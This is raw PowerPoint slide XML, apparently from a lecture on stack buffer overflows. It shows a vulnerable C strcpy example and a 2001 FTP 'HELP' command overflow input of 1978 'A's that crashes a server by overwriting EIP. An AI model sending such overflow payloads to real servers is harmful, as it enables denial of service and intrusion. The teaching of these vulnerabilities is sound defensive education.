                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="76" y="228"/>
                  <a:pt x="76" y="228"/>
                  <a:pt x="76" y="228"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="34" y="228"/>
                  <a:pt x="0" y="262"/>
                  <a:pt x="0" y="304"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="0" y="346"/>
                  <a:pt x="34" y="380"/>
                  <a:pt x="76" y="380"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="228" y="380"/>
                  <a:pt x="228" y="380"/>
                  <a:pt x="228" y="380"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="228" y="532"/>
                  <a:pt x="228" y="532"/>
                  <a:pt x="228" y="532"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="228" y="574"/>
                  <a:pt x="262" y="608"/>
                  <a:pt x="304" y="608"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="346" y="608"/>
                  <a:pt x="380" y="574"/>
                  <a:pt x="380" y="532"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="380" y="380"/>
                  <a:pt x="380" y="380"/>
                  <a:pt x="380" y="380"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="532" y="380"/>
                  <a:pt x="532" y="380"/>
                  <a:pt x="532" y="380"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="574" y="380"/>
                  <a:pt x="608" y="346"/>
                  <a:pt x="608" y="304"/>
                </a:cubicBezTo>
                <a:cubicBezTo>
                  <a:pt x="608" y="262"/>
                  <a:pt x="574" y="228"/>
                  <a:pt x="532" y="22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FE99CCAF-C06B-4928-BA37-A4F0296E2D0A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="4067176" cy="6858000"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill>
            <a:gsLst>
              <a:gs pos="45000">
                <a:srgbClr val="996633">
                  <a:alpha val="29000"/>
                </a:srgbClr>
              </a:gs>
              <a:gs pos="79000">
                <a:schemeClr val="bg1">
                  <a:lumMod val="75000"/>
                  <a:alpha val="69000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="100000">
                <a:schemeClr val="bg2">
                  <a:lumMod val="75000"/>
                  <a:alpha val="59000"/>
                </a:schemeClr>
              </a:gs>
              <a:gs pos="62000">
                <a:schemeClr val="bg2">
                  <a:lumMod val="50000"/>
                  <a:alpha val="79000"/>
                </a:schemeClr>
              </a:gs>
            </a:gsLst>
            <a:lin ang="5400000" scaled="1"/>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ext Placeholder 1"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" sz="quarter" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="378901" y="424503"/>
            <a:ext cx="3475549" cy="1620991"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>AGENDA</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="160320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66461" y="356902"/>
            <a:ext cx="9645650" cy="699398"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Buffer overflow vulnerabilities: stack memory allocation</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="Rectangle 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{39197A71-8782-41BE-8532-0D1816DB06AC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1560443" y="1943015"/>
            <a:ext cx="5724940" cy="369332"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2"/>
              </a:solidFill>
              <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              <a:cs typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="26" name="Group 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B50A7BE8-B09B-4443-AF46-F5F2AE809A5B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="3125047" y="1244683"/>
            <a:ext cx="7701979" cy="5034414"/>
            <a:chOff x="901845" y="1770384"/>
            <a:chExt cx="6721697" cy="4393651"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="23" name="Group 22">
              <a:extLst>
                <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                  <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B94D49C9-FD08-402C-AF61-32376989BF98}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvGrpSpPr/>
            <p:nvPr/>
          </p:nvGrpSpPr>
          <p:grpSpPr>
            <a:xfrm>
              <a:off x="901845" y="1770384"/>
              <a:ext cx="5561905" cy="4393651"/>
              <a:chOff x="901845" y="1770384"/>
              <a:chExt cx="5561905" cy="4393651"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:pic>
            <p:nvPicPr>
              <p:cNvPr id="21" name="Picture 20">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{1CD0410C-78EA-4614-8F49-D5BD07551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845" y="1770384"/>
                <a:ext cx="5561905" cy="4393651"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
            </p:spPr>
          </p:pic>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="22" name="Rectangle 21">
                <a:extLst>
                  <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                    <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{93E0453B-E9BC-4A79-8C03-5878B01962AA}"/>
                  </a:ext>
                </a:extLst>
              </p:cNvPr>
              <p:cNvSpPr/>
              <p:nvPr/>
            </p:nvSpPr>
            <p:spPr>
              <a:xfrm>
                <a:off x="1020417" y="1943015"/>
                <a:ext cx="5261113" cy="3371107"/>
              </a:xfrm>
              <a:prstGeom prst="rect">
                <a:avLst/>
              </a:prstGeom>
              <a:solidFill>
                <a:schemeClr val="bg1">
                  <a:alpha val="71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1D72100F-A716-428F-AD61-02E2C2B99668}"/>
                </a:ext>
              </a:extLst>
            </p:cNvPr>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="1189383" y="2098110"/>
              <a:ext cx="6434159" cy="2981502"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="square">
              <a:spAutoFit/>
            </a:bodyPr>
            <a:lstStyle/>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="804000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>#include &lt;string.h&gt;</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:endParaRPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="804000"/>
                </a:solidFill>
                <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
              </a:endParaRPr>
            </a:p>
            <a:p>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foo </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000080"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="8000FF"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>char</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bar</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000080"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
            </a:p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000080"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>{</a:t>
              </a:r>
            </a:p>
            <a:p>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char</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> c</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12</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000080"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>];</a:t>
              </a:r>
            </a:p>
            <a:p>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strcpy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bar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no bounds checking</a:t>
              </a:r>
            </a:p>
            <a:p>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i</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="8000FF"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>nt</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000000"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t> main </a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000080"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>(</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" dirty="0" err="1">
                  <a:solidFill>
                    <a:srgbClr val="8000FF"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>int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argc</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char</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argv</a:t>
              </a:r>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000080"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>)</a:t>
              </a:r>
            </a:p>
            <a:p>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foo</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argv</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p>
            <a:p>
              <a:r>
                <a:rPr lang="en-US" b="1" dirty="0">
                  <a:solidFill>
                    <a:srgbClr val="000080"/>
                  </a:solidFill>
                  <a:latin typeface="Courier New" panose="02070309020205020404" pitchFamily="49" charset="0"/>
                </a:rPr>
                <a:t>  </a:t>
              </a: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effectLst/>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
      </p:grpSp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="29527185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38739" y="316834"/>
            <a:ext cx="9645650" cy="699398"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>Buffer overflow vulnerabilities: stack grows down</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="8" name="Picture 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{87175E13-C53D-4B5D-8F18-9BA5685B3F5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270" b="94363" l="10000" r="90000">
                        <a14:foregroundMark x1="37391" y1="5270" x2="70725" y2="5270"/>
                        <a14:foregroundMark x1="28551" y1="89216" x2="43333" y2="93137"/>
                        <a14:foregroundMark x1="43333" y1="93137" x2="69710" y2="91054"/>
                        <a14:foregroundMark x1="69710" y1="91054" x2="70290" y2="90441"/>
                        <a14:foregroundMark x1="72174" y1="93137" x2="28841" y2="94363"/>
                        <a14:foregroundMark x1="28841" y1="94363" x2="25652" y2="90441"/>
                        <a14:foregroundMark x1="21739" y1="94118" x2="21739" y2="94118"/>
                        <a14:foregroundMark x1="78551" y1="94363" x2="78551" y2="94363"/>
                        <a14:foregroundMark x1="84638" y1="73284" x2="84928" y2="73284"/>
                      </a14:backgroundRemoval>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6435612" y="1091920"/>
            <a:ext cx="4598504" cy="5438231"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Picture 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{21EAAA40-0E68-4C30-A5CD-D92BC623F15E}"/>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3309" b="92892" l="9632" r="89492">
                        <a14:foregroundMark x1="23818" y1="8333" x2="37478" y2="2819"/>
                        <a14:foregroundMark x1="37478" y1="2819" x2="63222" y2="3309"/>
                        <a14:foregroundMark x1="63222" y1="3309" x2="76007" y2="9436"/>
                        <a14:foregroundMark x1="22417" y1="87745" x2="41681" y2="92279"/>
                        <a14:foregroundMark x1="41681" y1="92279" x2="62522" y2="92647"/>
                        <a14:foregroundMark x1="62522" y1="92647" x2="75131" y2="85907"/>
                        <a14:foregroundMark x1="75131" y1="85907" x2="75131" y2="85662"/>
                        <a14:foregroundMark x1="83888" y1="92892" x2="83888" y2="92892"/>
                      </a14:backgroundRemoval>
                    </a14:imgEffect>
                  </a14:imgLayer>
                </a14:imgProps>
              </a:ext>
            </a:extLst>
          </a:blip>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="1659248" y="1207651"/>
            <a:ext cx="3764765" cy="5380119"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="12" name="Picture 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8FF1401A-243E-40C7-8A8A-0B0B1D0F1FB3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId7">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5245347" y="2547675"/>
            <a:ext cx="1990332" cy="1759245"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="139700" dist="38100" dir="2700000" sx="103000" sy="103000" algn="tl" rotWithShape="0">
              <a:schemeClr val="accent5">
                <a:lumMod val="20000"/>
                <a:lumOff val="80000"/>
                <a:alpha val="40000"/>
              </a:schemeClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="TextBox 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F2E77958-0ABB-4321-959F-50DB6C8E7796}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1036916" y="1836461"/>
            <a:ext cx="505459" cy="3949148"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="wordArtVert" wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Stack growth</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="18" name="Arrow: Up 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{EAE68DAF-574F-438E-8CF0-BDB317CC3C1D}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1644408" y="2985835"/>
            <a:ext cx="431034" cy="1321085"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent5">
                  <a:lumMod val="47000"/>
                  <a:alpha val="19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Arrow: Up 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{9E5A1004-691B-42A2-81F7-04CBCC1FFCFB}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm rot="10800000">
            <a:off x="10210666" y="2869059"/>
            <a:ext cx="417606" cy="1437861"/>
          </a:xfrm>
          <a:prstGeom prst="upArrow">
            <a:avLst/>
          </a:prstGeom>
          <a:gradFill flip="none" rotWithShape="1">
            <a:gsLst>
              <a:gs pos="0">
                <a:schemeClr val="accent5">
                  <a:lumMod val="47000"/>
                  <a:alpha val="19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AAD713F-667C-4FD0-860C-350645F08915}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="10643112" y="898022"/>
            <a:ext cx="505459" cy="5379934"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="wordArtVert" wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" kern="0" spc="-100" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="accent5">
                    <a:lumMod val="20000"/>
                    <a:lumOff val="80000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Memory addresses</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="394673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17981" y="159026"/>
            <a:ext cx="10400979" cy="1245705"/>
          </a:xfrm>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>  Stack overflow vulnerabilities: a “hello world!” </a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>                                                                                      </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" i="1" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>example (2001)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1800" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2"/>
                </a:solidFill>
              </a:rPr>
              <a:t>   </a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Google Shape;207;p24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{0BB71736-22E7-47AC-9231-D7CBF08F8A6F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7307067" y="2145273"/>
            <a:ext cx="3848867" cy="3166279"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr spcFirstLastPara="1" wrap="square" lIns="91425" tIns="45700" rIns="91425" bIns="45700" anchor="t" anchorCtr="0">
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr lang="en-US" sz="2000" dirty="0">
              <a:solidFill>
                <a:schemeClr val="bg2">
                  <a:lumMod val="90000"/>
                </a:schemeClr>
              </a:solidFill>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
              </a:rPr>
              <a:t>Send "HELP " + (“A” x 1978) + “CCCC\x00\x0D\x0A” to FTP server without logging in and see what happens…</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="26" name="Picture 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{30192A48-6EC8-418F-8B35-43C0FD9932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65" y="1620118"/>
            <a:ext cx="6342265" cy="4576175"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:effectLst>
            <a:outerShdw blurRad="444500" dist="406400" dir="2160000" algn="l" rotWithShape="0">
              <a:prstClr val="black">
                <a:alpha val="40000"/>
              </a:prstClr>
            </a:outerShdw>
          </a:effectLst>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="22" name="Picture 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{BA4B3EEC-6E69-4B11-B3D6-DC8EB7FF1B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4562" y="4038671"/>
            <a:ext cx="2538435" cy="2262194"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="30156390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9"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200" fill="hold"/>
                                        <p:tgtEl>
                                          <p:spTgt spid="22"/>
                                        </p:tgtEl>
                                        <p:attrNameLst>
                                          <p:attrName>ppt_x</p:attrName>
                                        </p:attrNameLst>
                                      </p:cBhvr>
                                      <p:tavLst>
                                        <p:tav tm="0">
                                          <p:val>
                                            <p:strVal val="0-#ppt_w/2"/>
                                          </p:val>
                                        </p:tav>
                                        <p:tav tm="100000">
                                          <p:val>
                                            <p:strVal val="#ppt_x"/>
                                          </p:val>
                                        </p:tav>
                                      </p:tavLst>
                                    </p:anim>
                                    <p:anim calcmode="lin" valueType="num">
                                      <p:cBhvr additive="base">
                                        <p:cTn id="12" dur="12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679911" y="2350424"/>
            <a:ext cx="11217896" cy="3286102"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr>
            <a:noAutofit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="Θ"/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>SERVER.EXE crashes because EIP == 0x43434343 ! (Denial-of-Service vulnerability)</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="342900" lvl="0" indent="-342900" algn="l" defTabSz="914400">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buSzTx/>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="Θ"/>
              <a:tabLst/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
              <a:t>Return address was overwritten</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="1028700" lvl="1" indent="-342900">
              <a:spcBef>
                <a:spcPts val="1000"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="bg2"/>
              </a:buClr>
              <a:buFont typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:buChar char="ο"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="90000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:cs typeface="+mn-cs"/>
              </a:rPr>
